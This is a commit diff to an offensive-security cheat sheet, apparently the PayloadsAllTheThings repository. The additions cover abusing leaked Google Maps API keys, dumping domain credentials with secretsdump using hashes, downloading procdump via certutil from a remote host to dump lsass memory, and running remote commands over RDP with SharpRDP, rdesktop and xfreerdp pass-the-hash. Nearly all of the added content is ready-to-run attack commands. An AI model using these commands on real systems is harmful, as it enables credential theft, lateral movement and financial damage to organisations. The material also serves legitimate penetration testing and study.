Maps API + secretsdump enabled user/pw last set + certutil mimikatz

This commit is contained in:
Swissky 2020-02-06 21:41:29 +01:00
parent 9c4578f083
commit aba6874517
4 changed files with 26 additions and 5 deletions

View File

@ -6,6 +6,7 @@
- [Tools](#tools)
- [Exploit](#exploit)
- [Google Maps](#google-maps)
- [Algolia](#algolia)
- [AWS Access Key ID & Secret](#aws-access-key-id--secret)
- [Slack API Token](#slack-api-token)
@ -27,6 +28,14 @@
The following commands can be used to takeover accounts or extract personnal informations from the API using the leaked token.
### Google Maps
Use : https://github.com/ozguralp/gmapsapiscanner/
Impact:
* Consuming the company's monthly quota or can over-bill with unauthorized usage of this service and do financial damage to the company
* Conduct a denial of service attack specific to the service if any limitation of maximum bill control settings exist in the Google account
### Algolia
```powershell

View File

@ -489,10 +489,13 @@ secretsdump.py -system /root/SYSTEM -ntds /root/ntds.dit LOCAL
secretsdump also works remotely
```java
./secretsdump.py -dc-ip IP AD\administrator@domain -use-vss
./secretsdump.py -dc-ip IP AD\administrator@domain -use-vss -pwd-last-set -user-status
./secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1
```
* `-pwd-last-set`: Shows pwdLastSet attribute for each NTDS.DIT account.
* `-user-status`: Display whether or not the user is disabled.
#### Alternatives - modules
Metasploit modules

View File

@ -63,8 +63,11 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
Dump the lsass process.
```powershell
C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
# HTTP method
certutil -urlcache -split -f http://live.sysinternals.com/procdump.exe C:\Users\Public\procdump.exe
C:\Users\Public\procdump.exe -accepteula -ma lsass.exe lsass.dmp
# SMB method
net use Z: https://live.sysinternals.com
Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
```

View File

@ -131,8 +131,15 @@ PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -s # get
## RDP Remote Desktop Protocol
Abuse RDP protocol to execute commands remotely with [SharpRDP](https://github.com/0xthirteen/SharpRDP)
```powershell
SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password
```
Or connect remotely with `rdesktop`
```powershell
python rdpcheck.py DOMAIN/username:password@10.10.10.10
rdesktop -d DOMAIN -u username -p password 10.10.10.10 -g 70 -r disk:share=/home/user/myshare
rdesktop -u username -p password -g 70 -r disk:share=/tmp/myshare 10.10.10.10
# -g : the screen will take up 70% of your actual screen size
@ -165,7 +172,7 @@ or with Metasploit
run getgui -u admin -p 1234
```
Then log in using xfreerdp
or with xfreerdp
```powershell
xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1 # pass the hash works for Server 2012 R2 / Win 8.1+
@ -173,7 +180,6 @@ xfreerdp -u test -p 36374BD2767773A2DD4F6B010EC5EE0D 192.168.226.129 # pass the
xfreerd /u:runner /v:10.0.0.1 # password will be asked
```
## Netuse
Windows only